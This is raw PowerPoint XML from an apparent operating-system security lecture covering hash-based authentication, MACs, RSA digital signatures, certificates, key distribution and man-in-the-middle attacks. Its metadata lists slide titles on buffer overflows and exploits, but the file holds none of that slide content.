              <a:t>) can be sent with a message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But if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is known someone could modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>recompute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 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H(m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and modification not detected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So must authenticate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H(m)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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0539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2563"/>
            <a:ext cx="8229600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Authentication - MAC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55675"/>
            <a:ext cx="8839199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Symmetric encryption used in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message-authentication code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MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) authentication algorithm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Cryptographic checksum generated from message using secret key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Can securely authenticate short values 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If used to authenticate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H(m)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> that is collision resistant, then obtain a way to securely authenticate long message by hashing them first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Note that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is needed to compute both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>S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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, so anyone able to compute one can compute the other</a:t>
            </a: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  <a:p>
            <a:endParaRPr lang="en-US" dirty="0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7480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512175" cy="576262"/>
          </a:xfrm>
        </p:spPr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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication – Digital Signature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33400"/>
            <a:ext cx="8991600" cy="5202238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Based on asymmetric keys and digital signature algorithm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Authenticators produced are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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digital signatures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Very useful – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> can verify authenticity of a message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In a digital-signature algorithm, computationally infeasible to derive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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v</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is a one-way function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Thus,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v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the public key and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s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is the private key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider the RSA digital-signature algorithm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Similar to the RSA encryption algorithm, but the key use is reversed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Digital signature of message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>S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ks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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="12000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="12000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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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The key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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s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again is a pair (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>d, N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>), where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is the product of two large, randomly chosen prime numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Verification algorithm is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="-25000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>kv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m, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="10000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"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satisfies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mod (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>− 1)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>− 1) = 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36069536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973138" y="100013"/>
            <a:ext cx="7713662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Authentication (Cont.)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082675"/>
            <a:ext cx="7164388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Why authentication if a subset of encryption?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Fewer computations (except for RSA digital signatures)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Authenticator usually shorter than message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Sometimes want authentication but not confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Signed patches et al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Can be basis for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>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non-repudiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286696721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4300"/>
            <a:ext cx="8229600" cy="576263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Key Distribution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425" y="1165225"/>
            <a:ext cx="6359525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Delivery of symmetric key is huge challenge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Sometimes done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>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out-of-band</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Asymmetric keys can proliferate – stored on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key ring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Even asymmetric key distribution needs care – man-in-the-middle attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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62209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822325" y="182563"/>
            <a:ext cx="7878763" cy="576262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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Digital Certificates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700" y="1111250"/>
            <a:ext cx="6700838" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proof of who or what owns a public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Public key digitally signed a trusted party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Trusted party receives proof of identification from entity and certifies that public key belongs to entity</a:t>
            </a:r>
          </a:p>
          <a:p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Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>authority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> are trusted party – their public keys included with web browser distributions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They vouch for other authorities via digitally signing their keys, and so on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica" charset="0"/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0802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76350" y="150813"/>
            <a:ext cx="7869238" cy="485775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-middle Attack on Asymmetric Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4813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88" y="957263"/>
            <a:ext cx="4443412" cy="539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7496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860425" y="155575"/>
            <a:ext cx="7826375" cy="576263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Implementation of Cryptography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762000" y="685800"/>
            <a:ext cx="3586163" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can be done at various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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layers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> of ISO Reference Model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SSL at the Transport layer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Network layer is typically </a:t>
            </a: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IPSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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IKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> for key exchange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Basis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Virtual Private Networks (VPNs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Why not just at lowest level?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sometimes need more knowledge than available at low levels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i.e. User authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>i.e. e-mail delivery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 3" descr="Screen shot 2011-04-30 at 8.45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813" y="906463"/>
            <a:ext cx="1978025" cy="587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TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6338888" y="4497388"/>
            <a:ext cx="2051050" cy="43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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1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>
              <a:defRPr kumimoji="1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kumimoji="0" lang="en-US" sz="800">
                <a:latin typeface="Verdana" charset="0"/>
              </a:rPr>
              <a:t>Source: http://en.wikipedia.org/wiki/OSI_model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49158" name="Picture 5" descr="Screen shot 2011-04-30 at 8.46.34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979488"/>
            <a:ext cx="2613025" cy="341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1699534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77790</TotalTime>
  <Words>10070</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>1426</Paragraphs>
  <Slides>108</Slides>
  <Notes>43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108</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="118" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>OS Security</vt:lpstr>
      <vt:lpstr>The Security Problem</vt:lpstr>
      <vt:lpstr>Security Violation Categories</vt:lpstr>
      <vt:lpstr>Security Violation Methods</vt:lpstr>
      <vt:lpstr>Standard Security Attacks</vt:lpstr>
      <vt:lpstr>Security Measure Levels</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats (Cont.)</vt:lpstr>
      <vt:lpstr>C Program with Buffer-overflow Condition</vt:lpstr>
      <vt:lpstr>Layout of Typical Stack Frame</vt:lpstr>
      <vt:lpstr>Modified Shell Code</vt:lpstr>
      <vt:lpstr>Hypothetical Stack Frame</vt:lpstr>
      <vt:lpstr>Great Programming Required?</vt:lpstr>
      <vt:lpstr>Anatomy of the Stack</vt:lpstr>
      <vt:lpstr>Example Program</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Example Program 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Example Program 3</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Exploit Considerations</vt:lpstr>
